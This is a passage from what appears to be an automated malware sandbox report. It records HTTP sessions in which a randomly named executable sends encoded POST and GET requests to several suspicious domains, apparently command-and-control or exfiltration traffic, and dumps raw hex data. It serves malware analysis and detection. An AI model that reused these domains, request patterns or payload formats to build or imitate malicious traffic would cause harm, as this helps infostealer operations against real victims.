                                                                  Data Ascii: 3h=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmodeZylls1Yh3dDEq5nyxpbLfjA6jOQfd7iD5qJ1lnRE1tyJhYqOa9ej7H2s818nNmJLOeYP6OnemVkdNHa0SGV9lwNHSHwFECNpkfVS8I8FYiZaX+4S5UB30t6ySRfJwX74EJO3iwmve2aFpD+dBX59ozjZLZSsRBKRXhBUOFHCB2BHvi/+tSpZytTaC0EOmFbPb2xkhVdPAaBSvlYWNCDXwLWL2uHvpoeOkrU9rBHYNe8ZijQt2DyFG/XWaGWLqfE6a5qnF4ubz/zgCr+H2BhFsSwzhH5yVJYJKIN9lLaf8SQe4oWCblOwpmQzDXj/8CsOA5pKc/1y5j8WtStLuHmG2sGafv3jv3FF/szyWBGZw5Pv+5sXvPEGxIsNN9vr7y0VudCaP1vdKFkYlU1ur7pB8tfqIo71pblSd7xWrGncAL0Ccs0ddwmywWzvKZwSIHRRUK4kZKBXBntOHx/eBUlBY4U5vd5QnAkcl5oMs6FeBgAFH/nIQ5upUDWxOZ2MrmidUyMHDZVCdOXv6cpZL//ihx5+lTR7tLAFGzfnKjLNEWkJE2Xp+jtAcU0amCSAVcqZGWsfLemHUIYtn9NSy4V2zPbiH1/HEfN2Zd05ls9/pqjZZtXQ3nr1opgIOw594Sba+34XJXyQWKEzW/JLgL3MfOpRAf5Qmc7kJd9jQNEYdjfS11cMWb0mtj6Gu2bgxudYIuZe7xLDRH7kM6TXlLaD0twA1O0a9IUgeylsaFHVNcyV9d2CKHYoi/GhAVp4Y7dH1v7SVXvEPk85eHqMKBqWEPKgf3uQ/FKLrqJSyhGBLP+G5n7BFZE14OI3z8+M9T9zDt/8/3Vze4w6TqdmPofnwo8v9fFDJlGmC1EvWvtCDwxWwED/zGtOG+seqc8UqI/A4co1tXxpggBB04o+YK0tMpLVLKfqJLVx/CWFUpzZIQiLVEaZAN13MJCgvP2pIXbVAqSV [TRUNCATED]
                                                                  Jan 10, 2025 18:51:58.225920916 CET1236INHTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:57 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1138
                                                                  x-request-id: f56b8029-d8f5-4800-8f6b-ec0e42046467
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==
                                                                  set-cookie: parking_session=f56b8029-d8f5-4800-8f6b-ec0e42046467; expires=Fri, 10 Jan 2025 18:06:58 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 10, 2025 18:51:58.225967884 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjU2YjgwMjktZDhmNS00ODAwLThmNmItZWMwZTQyMDQ2NDY3IiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.449930199.59.243.228801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:00.256920099 CET464OUTGET /cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.969-usedcar02.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:00.746696949 CET1236INHTTP/1.1 200 OK
                                                                  date: Fri, 10 Jan 2025 17:51:59 GMT
                                                                  content-type: text/html; charset=utf-8
                                                                  content-length: 1470
                                                                  x-request-id: fb41306e-6418-457b-8a35-bc8b3f9e18ed
                                                                  cache-control: no-store, max-age=0
                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                  vary: sec-ch-prefers-color-scheme
                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xPepBT6faatcpleza/H6qqVwOvtYmu3dqKgdaXbAErsHRE04G0l9y507/DW/QdUzBRTNHMbP5Z0Bh3dZagMZ5g==
                                                                  set-cookie: parking_session=fb41306e-6418-457b-8a35-bc8b3f9e18ed; expires=Fri, 10 Jan 2025 18:07:00 GMT; path=/
                                                                  connection: close
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 78 50 65 70 42 54 36 66 61 61 74 63 70 6c 65 7a 61 2f 48 36 71 71 56 77 4f 76 74 59 6d 75 33 64 71 4b 67 64 61 58 62 41 45 72 73 48 52 45 30 34 47 30 6c 39 79 35 30 37 2f 44 57 2f 51 64 55 7a 42 52 54 4e 48 4d 62 50 35 5a 30 42 68 33 64 5a 61 67 4d 5a 35 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xPepBT6faatcpleza/H6qqVwOvtYmu3dqKgdaXbAErsHRE04G0l9y507/DW/QdUzBRTNHMbP5Z0Bh3dZagMZ5g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                  Jan 10, 2025 18:52:00.746747017 CET923INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmI0MTMwNmUtNjQxOC00NTdiLThhMzUtYmM4YjNmOWUxOGVkIiwicGFnZV90aW1lIjoxNzM2NTMxNT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.4499658.136.96.106801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:06.223392010 CET731OUTPOST /b6bc/ HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.juewucangku.xyz
                                                                  Referer: http://www.juewucangku.xyz/b6bc/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 69 32 67 4d 4c 76 76 35 67 6a 6e 6c 50 51 2b 41 66 46 55 6e 4a 49 54 79 4c 4a 61 67 6f 6f 67 78 6b 4e 5a 77 36 30 2b 79 65 52 32 34 54 6c 73 6b 35 47 65 67 57 4a 34 6e 72 41 62 4a 67 43 53 6d 66 66 66 5a 6c 50 59 2b 67 65 2b 52 54 56 30 61 4f 38 71 4f 42 57 74 32 6e 76 41 56 31 70 6d 62 62 6a 49 70 73 58 75 70 6f 67 36 6d 7a 61 36 53 31 56 51 72 6a 76 79 4a 51 44 5a 30 38 47 54 31 69 62 49 2b 6d 62 6d 35 56 46 4c 57 4d 74 74 43 47 66 34 34 54 68 31 35 4f 43 4f 38 74 34 62 35 68 32 4b 65 4e 44 32 66 54 50 6d 34 55 48 48 47 35 65 4f 39 66 77 3d 3d
                                                                  Data Ascii: 3h=8qp4YhFXg8NLi2gMLvv5gjnlPQ+AfFUnJITyLJagoogxkNZw60+yeR24Tlsk5GegWJ4nrAbJgCSmfffZlPY+ge+RTV0aO8qOBWt2nvAV1pmbbjIpsXupog6mza6S1VQrjvyJQDZ08GT1ibI+mbm5VFLWMttCGf44Th15OCO8t4b5h2KeND2fTPm4UHHG5eO9fw==
                                                                  Jan 10, 2025 18:52:07.165193081 CET403INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:07 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.4499818.136.96.106801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:08.775963068 CET751OUTPOST /b6bc/ HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.juewucangku.xyz
                                                                  Referer: http://www.juewucangku.xyz/b6bc/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 77 43 6b 4d 4d 49 62 35 33 54 6e 69 52 67 2b 41 51 6c 55 6a 4a 49 66 79 4c 49 65 77 6f 62 55 78 6c 74 70 77 31 52 65 79 64 52 32 34 62 46 73 68 39 47 65 72 57 4a 39 53 72 46 6a 4a 67 43 47 6d 66 64 33 5a 6c 34 4d 35 67 4f 2b 54 47 46 30 55 4b 38 71 4f 42 57 74 32 6e 75 6c 77 31 70 2b 62 61 53 34 70 74 31 57 71 68 41 36 6e 35 36 36 53 78 56 52 69 6a 76 79 52 51 43 31 53 38 41 58 31 69 66 4d 2b 6d 76 53 36 66 46 4c 51 43 4e 73 57 42 76 46 64 4c 55 63 68 45 52 36 61 6e 4c 2f 61 67 77 48 45 63 79 58 49 42 50 43 4c 4a 41 4f 79 30 64 7a 30 45 39 6a 62 32 6b 50 46 32 66 6a 7a 2f 47 6d 4c 41 75 59 4e 37 55 63 3d
                                                                  Data Ascii: 3h=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewobUxltpw1ReydR24bFsh9GerWJ9SrFjJgCGmfd3Zl4M5gO+TGF0UK8qOBWt2nulw1p+baS4pt1WqhA6n566SxVRijvyRQC1S8AX1ifM+mvS6fFLQCNsWBvFdLUchER6anL/agwHEcyXIBPCLJAOy0dz0E9jb2kPF2fjz/GmLAuYN7Uc=
                                                                  Jan 10, 2025 18:52:09.706751108 CET403INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:09 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.4499948.136.96.106801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:11.323052883 CET10833OUTPOST /b6bc/ HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.juewucangku.xyz
                                                                  Referer: http://www.juewucangku.xyz/b6bc/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 77 43 6b 4d 4d 49 62 35 33 54 6e 69 52 67 2b 41 51 6c 55 6a 4a 49 66 79 4c 49 65 77 6f 61 73 78 6c 66 68 77 36 51 65 79 63 52 32 34 52 6c 73 67 39 47 65 32 57 4a 46 65 72 46 66 7a 67 42 2b 6d 66 38 58 5a 73 70 4d 35 7a 75 2b 54 65 31 30 56 4f 38 71 66 42 57 39 79 6e 75 31 77 31 70 2b 62 61 51 67 70 39 58 75 71 74 67 36 6d 7a 61 36 67 31 56 51 4c 6a 76 36 76 51 43 42 6b 39 77 33 31 6a 2f 63 2b 6b 36 6d 36 54 46 4c 53 42 4e 73 65 42 76 4a 4f 4c 51 45 74 45 52 2b 67 6e 49 6a 61 68 6b 75 2b 59 6d 54 35 57 4f 71 4c 4c 53 43 50 37 63 6d 34 63 64 48 55 6c 30 7a 6c 30 2f 2f 72 39 31 33 79 52 72 46 47 74 42 79 2b 46 70 78 63 59 30 77 31 52 4f 32 34 75 7a 5a 2f 6a 62 4a 33 6f 65 49 4a 4a 4b 56 52 5a 72 43 73 53 68 72 59 6a 4b 67 44 71 48 7a 53 2b 43 74 77 64 42 73 33 6e 4a 61 73 6f 41 45 4f 31 41 45 6c 43 68 6d 4e 74 75 57 58 56 76 53 56 4e 69 6e 65 5a 69 58 4d 4c 42 43 53 50 43 37 55 51 73 32 64 4d 33 77 76 71 6a 58 39 38 6c 31 69 4b 72 65 73 61 64 68 41 67 31 77 [TRUNCATED]
                                                                  Data Ascii: 3h=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewoasxlfhw6QeycR24Rlsg9Ge2WJFerFfzgB+mf8XZspM5zu+Te10VO8qfBW9ynu1w1p+baQgp9Xuqtg6mza6g1VQLjv6vQCBk9w31j/c+k6m6TFLSBNseBvJOLQEtER+gnIjahku+YmT5WOqLLSCP7cm4cdHUl0zl0//r913yRrFGtBy+FpxcY0w1RO24uzZ/jbJ3oeIJJKVRZrCsShrYjKgDqHzS+CtwdBs3nJasoAEO1AElChmNtuWXVvSVNineZiXMLBCSPC7UQs2dM3wvqjX98l1iKresadhAg1wIBuBkQSD/J0wYv5zan9ZHxifoumNZszK2BjoIyC2kOou9zmwndkVvRDc5QMhukxHf9pI/VWxRoQpF6ocDFRl3JcUbzRGvyIMvc5hQn6BFLSpxzkMmZgrVoDWDek/8PcI/Ydnu3ywR2mT/fQuCqZG1mdCr2kjytLh/RpRd8CMzHgrxjxu+Gy3RLDI1QFQFKoRGF4VX8SN5tbNv222QQ44Q3ywod4rKlZ1ojmZkY4dF+VxPsExdvLycZEgovH1fTz/CwJa7qATA6awDSi9GZW/ytRFjFrUftIGko/gja6wZNfj5nrI5Vid7tgHIDOWI53hkWMeV4dHRwR+2rF/KxOb+Vrm5kMYrE0O5x0KNWsO3c28CQ1dNvPzW0js1pnMTTGiopuiYdSbLjr5JDqEPShAXug7m2eJIAd25o8bIIcrNElMtpZf07+WbbGv0oUd5/0W3/lijtHh+nXKYZ03ugx5KrsGkMN9ONf2SKGgmF5EnMLfhci1f4xowvo5XTyWa/ab1pRU5BYmA2bIrpS344CvuCw4zOo3mqIZjRwlvoLbnUU9iGZIo3m724LG8SIIMC+W2KHWMre0HvMDYHUXicaL+EAK4c/PgkKHEQ81cRMd+czPTHYzk5rBFE8V/dVP8WTJC5niHBaNdOcDVFchnhQYq+XvGTpGDgqVzM [TRUNCATED]
                                                                  Jan 10, 2025 18:52:12.233537912 CET403INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:12 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.4500098.136.96.106801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:13.869534969 CET461OUTGET /b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.juewucangku.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:52:14.811527014 CET544INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:52:14 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.45001969.57.163.64801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:52:19.940507889 CET740OUTPOST /9er8/ HTTP/1.1
                                                                  Host: www.startsomething.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.startsomething.xyz
                                                                  Referer: http://www.startsomething.xyz/9er8/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 42 2f 76 4e 38 35 45 71 72 74 2b 74 31 66 73 62 41 4c 4a 57 6a 2b 61 75 45 55 69 70 33 69 30 69 6d 4d 6c 4c 43 38 46 4a 35 68 6c 46 33 61 59 32 33 65 51 2f 57 44 77 54 73 6b 71 6c 75 53 47 34 5a 6d 4d 58 42 47 67 6f 45 6d 5a 75 34 67 38 5a 61 31 34 72 35 70 4a 6c 47 62 74 32 2b 70 31 55 4b 79 59 79 62 35 48 52 65 36 6d 5a 73 37 67 59 52 64 69 54 59 31 51 72 66 6b 51 66 55 63 72 76 79 37 7a 74 49 61 43 76 66 73 67 46 4c 53 42 73 30 4f 66 56 4b 68 55 6f 6e 73 59 42 5a 38 32 62 35 79 57 36 4a 4a 4e 4c 5a 64 52 32 67 4a 54 53 67 59 4c 35 54 67 3d 3d
